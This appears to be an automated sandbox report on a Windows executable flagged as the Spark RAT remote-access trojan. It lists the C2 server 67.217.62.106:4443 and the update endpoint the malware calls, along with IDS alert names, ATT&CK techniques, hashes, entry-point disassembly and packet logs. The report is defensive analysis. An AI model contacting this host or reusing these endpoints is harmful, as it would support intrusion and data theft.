      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.3007239925.00000000010A9000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: msoia.exe PID: 7004, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.3007239925.00000000010A9000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: msoia.exe PID: 7004, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
      Windows Management Instrumentation
      1
      DLL Side-Loading
      11
      Process Injection
      12
      Virtualization/Sandbox Evasion
      1
      Credential API Hooking
      32
      Security Software Discovery
      Remote Services1
      Credential API Hooking
      11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Abuse Elevation Control Mechanism
      11
      Process Injection
      11
      Input Capture
      12
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol11
      Input Capture
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Abuse Elevation Control Mechanism
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS114
      System Information Discovery
      Distributed Component Object ModelInput Capture2
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      msoia.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://67.217.62.106:4443/wstrue
        unknown
        http://67.217.62.106:4443/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windowstrue
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          67.217.62.106
          unknownUnited States
          19318IS-AS-1UStrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1541453
          Start date and time:2024-10-24 21:04:08 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 39s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:msoia.exe
          Detection:MAL
          Classification:mal92.troj.evad.winEXE@4/1@0/1
          EGA Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target msoia.exe, PID 7004 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: msoia.exe
          TimeTypeDescription
          15:05:10API Interceptor82x Sleep call for process: msoia.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          67.217.62.106dockerc.exeGet hashmaliciousSpark RATBrowse
          • 67.217.62.106:4443/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows
          dockerc.exeGet hashmaliciousSpark RATBrowse
          • 67.217.62.106:4443/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows
          mk6NFaiemI.exeGet hashmaliciousSpark RATBrowse
          • 67.217.62.106:4443/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows
          idvzN3Tv6e.elfGet hashmaliciousUnknownBrowse
          • 67.217.62.106:4443/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=linux
          mk6NFaiemI.exeGet hashmaliciousSpark RATBrowse
          • 67.217.62.106:4443/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows
          FjVs8q7ufl.exeGet hashmaliciousSpark RATBrowse
          • 67.217.62.106:4443/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          IS-AS-1UShttps://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/Get hashmaliciousUnknownBrowse
          • 74.50.66.170
          https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/Get hashmaliciousUnknownBrowse
          • 74.50.66.170
          https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/Get hashmaliciousUnknownBrowse
          • 74.50.66.170
          Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • 162.250.125.14
          d600758023374f78d58acafbcaf94af66ad203b28e22a.exeGet hashmaliciousQuasarBrowse
          • 173.214.167.207
          arm5.elfGet hashmaliciousMiraiBrowse
          • 216.219.94.103
          Pago factura_7273390_2024_I_53430000.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 162.250.125.14
          na.elfGet hashmaliciousMiraiBrowse
          • 162.246.17.57
          Install_SH9C73KR_x91.43.exeGet hashmaliciousUnknownBrowse
          • 205.209.126.138
          Mobile_App_Project_Details.xlsmGet hashmaliciousUnknownBrowse
          • 162.250.124.142
          No context
          No context
          Process:C:\Users\user\Desktop\msoia.exe
          File Type:GLS_BINARY_LSB_FIRST
          Category:dropped
          Size (bytes):160
          Entropy (8bit):4.438743916256937
          Encrypted:false
          SSDEEP:3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
          MD5:E467C82627F5E1524FDB4415AF19FC73
          SHA1:B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
          SHA-256:116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
          SHA-512:2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............
          File type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
          Entropy (8bit):7.893412632665146
          TrID:
          • Win64 Executable (generic) (12005/4) 74.95%
          • Generic Win/DOS Executable (2004/3) 12.51%
          • DOS Executable Generic (2002/1) 12.50%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
          File name:msoia.exe
          File size:16'498'688 bytes
          MD5:42cbc8f4803da0f2b8bbd3d13a37fc58
          SHA1:c82f1ba623b5f4210ddf7f20c40d4cec70298d92
          SHA256:fcf9b70253437c56bb00315da859ce8e40d6410ec405c1473b374359d5277209
          SHA512:209819e5d76f536d70e7aff1be6e9b9e4b8f2ffa887286dd27e282019f676b51caa788332ae0a0baf2f8799b0a0f4f517d101b71f71a603df17f696f5686abcb
          SSDEEP:393216:YsHCua3N0h5XbGqz2tZxeO5wgfR+4vhMxGhx+:Ym42h5aMkJ5wgfRdpMx0
          TLSH:0EF6234A65F593E4C4D34B40768A02DA33C1A59EC6FE8D2D3AC72C027F21D6B458AD7B
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."......t7..V........F.......@...........................................`... ............................
          Icon Hash:90cececece8e8eb0
          Entrypoint:0x186c2c7
          Entrypoint Section:.bss3
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:1
          File Version Major:6
          File Version Minor:1
          Subsystem Version Major:6
          Subsystem Version Minor:1
          Import Hash:9da18038e0ba9a33fbbaf76636ea1aff
          Instruction
          push ebp
          pushfd
          dec eax
          mov ebp, 4090D93Ah
          movsd
          push edi
          movsb
          das
          add bp, E518h
          dec eax
          shr ebp, FFFFFFFFh
          dec eax
          lea ebp, dword ptr [ebp+ebp*4+0F058108h]
          inc eax
          sub ch, ch
          dec eax
          sub ebp, ebp
          dec eax
          mov ebp, dword ptr [esp+ebp*4+00000008h]
          dec eax
          mov dword ptr [esp+08h], 61D42C1Fh
          push dword ptr [esp+00h]
          popfd
          dec eax
          lea esp, dword ptr [esp+08h]
          call 00007F8434AF5FAAh
          xchg eax, ebp
          push es
          inc ecx
          sbb byte ptr [edi], bl
          movsd
          in eax, dx
          lds edi, ecx
          xchg eax, edi
          pushfd
          iretd
          and eax, 97F1E5F5h
          pushfd
          iretd
          sub eax, 971123DDh
          pushfd
          iretd
          int 35h
          mov edx, dword ptr [ecx+4DCF9C97h]
          fstp qword ptr [ecx]
          cmp dword ptr [edi-221A3064h], edx
          mov esi, 5CB7631Ah
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x116f4180x50.bss3
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1fc44600x28c8.bss3
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1fc70000xcc.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x100b0000x58.bss2
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x3772680x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x3790000x37c1680x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x6f60000x168be00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .idata0x85f0000x47c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .bss00x8600000x123340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .symtab0x8730000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ
          .bss10x8740000x7961f90x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .bss20x100b0000x8100xa006ae61253a71fbeca72f7987a93af3722False0.025390625data0.1467378384792775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .bss30x100c0000xfbad280xfbae00b0ec3c095d0d5654a4acffe2905e961bunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .reloc0x1fc70000xcc0x2009edd410f1d862a8b2beb3d5369a5fe97False0.302734375data1.9454927733312573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          DLLImport
          kernel32.dllWriteFile
          kernel32.dllGetSystemTimeAsFileTime
          kernel32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2024-10-24T21:05:11.707648+02002046669ET MALWARE Win32/SparkRAT CnC Checkin (GET)1192.168.2.44973067.217.62.1064443TCP
          2024-10-24T21:05:17.355535+02002047681ET MALWARE Spark RAT CnC Checkin (POST)1192.168.2.44973267.217.62.1064443TCP
          2024-10-24T21:05:17.355535+02002855151ETPRO MALWARE Spark RAT User-Agent Observed1192.168.2.44973267.217.62.1064443TCP
          TimestampSource PortDest PortSource IPDest IP
          Oct 24, 2024 21:05:10.980827093 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:10.986376047 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:10.986659050 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:10.986990929 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:10.993262053 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:11.661786079 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:11.707648039 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:14.663079977 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:14.715552092 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:16.631038904 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:16.631692886 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:16.637464046 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:16.639446974 CEST44434973267.217.62.106192.168.2.4
          Oct 24, 2024 21:05:16.639528990 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:16.640028954 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:16.646888018 CEST44434973267.217.62.106192.168.2.4
          Oct 24, 2024 21:05:16.794431925 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:16.843251944 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:17.306231022 CEST44434973267.217.62.106192.168.2.4
          Oct 24, 2024 21:05:17.306901932 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:17.306945086 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:17.312344074 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:17.312546015 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:17.355535030 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:17.402008057 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:17.403168917 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:17.408655882 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:20.403563023 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:20.403904915 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:20.409261942 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:21.693073034 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:21.698964119 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:21.824419975 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:21.830399036 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:21.855144024 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:21.855645895 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:21.905908108 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:21.985686064 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:21.985984087 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:21.991297007 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:23.525974035 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:23.526274920 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:23.539321899 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:24.861115932 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:24.866791964 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:25.022809029 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:25.023160934 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:25.028462887 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:26.402709007 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:26.403007984 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:26.408590078 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:27.987549067 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:27.992959023 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:28.149327040 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:28.149694920 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:28.155288935 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:29.402296066 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:29.406383038 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:29.411787033 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:30.783962965 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:30.926067114 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:31.068057060 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:31.068419933 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:31.073704958 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:32.324465036 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:32.330238104 CEST44434973267.217.62.106192.168.2.4
          Oct 24, 2024 21:05:32.402911901 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:32.403172016 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:32.408626080 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:33.689495087 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:33.694997072 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:33.851335049 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:33.854506016 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:33.860003948 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:35.403227091 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:35.403760910 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:35.409162998 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:36.638391018 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:36.643892050 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:36.812625885 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:36.812925100 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:36.818332911 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:38.702475071 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:38.703042984 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:38.706257105 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:38.706325054 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:38.711899996 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:39.675409079 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:39.681186914 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:39.860074043 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:39.860330105 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:39.865869045 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:41.406199932 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:41.406677961 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:41.412333012 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:43.009900093 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:43.015870094 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:43.172744036 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:43.173207998 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:43.178795099 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:44.406933069 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:44.407212019 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:44.412718058 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:46.117973089 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:46.123478889 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:46.289047956 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:46.289387941 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:46.295409918 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:47.337512016 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:47.342909098 CEST44434973267.217.62.106192.168.2.4
          Oct 24, 2024 21:05:47.401943922 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:47.402359009 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:47.407741070 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:49.082760096 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:49.089241028 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:49.245393991 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:49.245673895 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:49.251065969 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:50.402785063 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:50.403110981 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:50.410008907 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:51.735377073 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:51.741134882 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:51.897128105 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:51.897511005 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:51.903712034 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:53.403001070 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:53.403372049 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:53.409024954 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:54.730463028 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:54.736167908 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:54.892119884 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:54.892458916 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:54.897835970 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:56.403156042 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:56.403609037 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:56.410824060 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:57.673480034 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:57.679110050 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:57.835529089 CEST44434973067.217.62.106192.168.2.4
